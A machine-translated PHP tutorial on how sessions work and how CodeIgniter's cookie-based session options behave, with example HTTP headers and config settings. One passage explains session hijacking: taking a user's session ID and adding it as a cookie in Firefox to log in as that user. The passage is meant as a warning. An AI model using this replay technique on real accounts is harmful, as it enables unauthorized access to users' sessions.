Home >Backend Development >PHP Tutorial >CodeIgniter configuration SESSION usage example analysis, session usage example_PHP tutorial

CodeIgniter configuration SESSION usage example analysis, session usage example_PHP tutorial

WBOY
WBOYOriginal
2016-07-12 09:00:25896browse

CodeIgniter configuration SESSION usage example analysis, session usage example

The example in this article describes the SESSION usage of CodeIgniter configuration. Share it with everyone for your reference, the details are as follows:

When I first started using Codeigniter, I was confused by the SESSION in it. Later, I never used the SESSION that comes with CI. I think it is still necessary to sort out the SESSION. In order to understand SESSION in CI, let's first talk about how SESSION works in PHP. Since the HTTP protocol itself is stateless, when retaining a user's access status information, the client needs to have a unique identifier passed to the server. This unique identifier is the SESSION ID, which is stored in the client's COOKIE, and then the server Read the stored user status information according to this identifier to achieve the purpose of saving the session status. To start a session in PHP, you need to execute the following statement:
Copy code The code is as follows: session_start();

1. Every time the client makes a request, some information will be stored in the HTTP header and sent to the server. Take the user’s first visit as an example:
Copy code The code is as follows: Request Headers
Accept:text/html,application/xhtml xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding:gzip,deflate,sdch
Accept-Language:zh-CN,zh;q=0.8
Cache-Control:max-age=0
Connection:keep-alive
Host:s.local
User-Agent:Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36

2. The server receives and processes the request and returns it to the client, and adds a request to add COOKIE to the HTTP Response, telling the browser that a COOKIE needs to be set. The COOKIE name is PHPSESSID and the value is r887k5n4scg32d4ba34huuhmq7, such as:
Copy code The code is as follows: Response Headers
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection:Keep-Alive
Content-Length:0
Content-Type:text/html
Date:Sun, 08 Dec 2013 12:56:56 GMT
Expires:Thu, 19 Nov 1981 08:52:00 GMT
Keep-Alive:timeout=5, max=100
Pragma:no-cache
Server:Apache/2.2.11 (Win32) PHP/5.4.7
Set-Cookie:PHPSESSID=r887k5n4scg32d4ba34huuhmq7; path=/
X-Powered-By:PHP/5.4.7

3. When the client visits the page of the website again, the browser will send the COOKIE to the server. The server reads the SESSION file stored on the server based on the value of the COOKIE and gets the session information, such as :
Copy code The code is as follows: Request Headers
Accept:text/html,application/xhtml xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding:gzip,deflate,sdch
Accept-Language:zh-CN,zh;q=0.8
Cache-Control:max-age=0
Connection:keep-alive
Cookie:PHPSESSID=r887k5n4scg32d4ba34huuhmq7
Host:s.local
User-Agent:Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63

To achieve the purpose of saving session state. But we also need to pay attention to what happens if we obtain the SESSION ID logged in by user A? According to the above logic, if the obtained SESSION ID is sent to the server during the request process, the server reads the file based on the SESSION ID and finds that the file content exists, thus determining that the user is user A, that is, user A is obtained User status, so some sensitive operations may be possible. Therefore, within the validity period of the session, obtaining the SESSION ID means obtaining the user's authorization. This is relatively dangerous. Taking a local management system as an example, after logging in through chrome, you can see the client COOKIE as shown below:

If you obtain the SESSION ID through some means, you can simulate sending the same COOKIE to log in. COOKIE can be added to FireFox. After opening Firebug, create a new cookie in Cookies. After confirming, refresh the page to log in to the management system, as shown below:

Usually, cookies can be obtained through js, so you need to pay attention to escaping to prevent them from being executed when the data is displayed. Next, take a look at SESSION in CI. There are several parameters related to Session configuration in the configuration file, which affect the use of Session. They are:

//session保存在cookie中的名称
$config['sess_cookie_name'] = 'ci_session';
//session的有效时间
$config['sess_expiration'] = 7200;
//是否关闭浏览器session失效
$config['sess_expire_on_close'] = FALSE;
//SESSION是否加密存放在COOKIE中
$config['sess_encrypt_cookie'] = FALSE;
//是否保存在数据库中
$config['sess_use_database']  = FALSE;
//存在数据库中,则数据库表名
$config['sess_table_name'] = 'ci_sessions';
//是否匹配IP
$config['sess_match_ip']  = FALSE;
//是否匹配UserAgent
$config['sess_match_useragent'] = TRUE;
//更新时间时间
$config['sess_time_to_update'] = 300;

The SESSION that comes with CI does not store files on the server side. All information is stored in the client COOKIE. When $this->load->library('session'); is called, a session will be started, that is, Set a COOKIE. The content of the COOKIE is as follows:

Array
(
[session_id] => f05138a9513e4928cb0a57672cfe3b53
[ip_address] => 127.0.0.1
[user_agent] => Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
[last_activity] => 1386569398
[user_data] =>
)

When the client requests, this information will be transmitted to the server in the HTTP header, and the server will read the SESSION information from the HTTP header. Sessions can be implemented in the same way, but there are many uncertain factors in this method. Let’s talk about a few points based on the source code:

1. If the log file appears: The session cookie data did not match what was expected. This could be a possible hacking attempt. Explain two problems: a.sess_encrypt_cookie is false, SESSION is not encrypted and stored in COOKIE b. After reading the COOKIE, the verification failed. When it comes to encryption, decryption, and parameter processing, it is easy to fail the match. If it fails, the SESSION will be cleared.

2. If sess_match_ip is true, when the client IP changes, the SESSION will fail the verification, thus clearing the SESSION.

3. sess_match_useragent defaults to true. When the client UserAgent changes, the verification fails and SESION is cleared. A simple example is to access through IE browser. If you switch to a different IE mode, the Agent is different, so the verification fails and the SESSION is cleared.

As you can see, when any of the above situations occurs, the SESSION will be cleared, and the login will fail or jump to the login page. What if there is no encryption, no verification of IP and UserAgent? Because COOKIE is stored on the client and needs to be sent to the server along with the HTTP request. Firstly, too many COOKIE will affect the speed and completely waste bandwidth for some resources such as pictures. Secondly, COOKIE can only store 4K data and is encrypted. It can be stored smaller after processing.

Various uncertain factors will produce all kinds of strange problems. Avoid too much entanglement and decisively switch to other methods.

Readers who are interested in more content related to the CodeIgniter framework can check out the special topic on this site: "Introduction to codeigniter tutorial"

I hope this article will be helpful to everyone’s PHP program design based on the CodeIgniter framework.

Articles you may be interested in:

  • CodeIgniter configuration database.php usage example analysis
  • CodeIgniter configuration routes.php usage example analysis
  • CodeIgniter Configuration config.php usage example analysis
  • CI (Codeigniter) Setting enhanced configuration class example
  • Using Smarty3 basic configuration in CodeIgniter
  • Configuring codeigniter framework method under Nginx
  • CI (CodeIgniter) framework configuration
  • Detailed introduction to the basic configuration of CodeIgniter
  • Analysis of CodeIgniter custom configuration file
  • CodeIgniter configuration autoload.php automatic loading usage analysis

www.bkjia.comtruehttp: //www.bkjia.com/PHPjc/1093699.htmlTechArticleCodeIgniter configuration SESSION usage example analysis, session usage example This article describes the SESSION usage of CodeIgniter configuration. Share it with everyone for your reference, the details are as follows: Just used...
Statement:
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn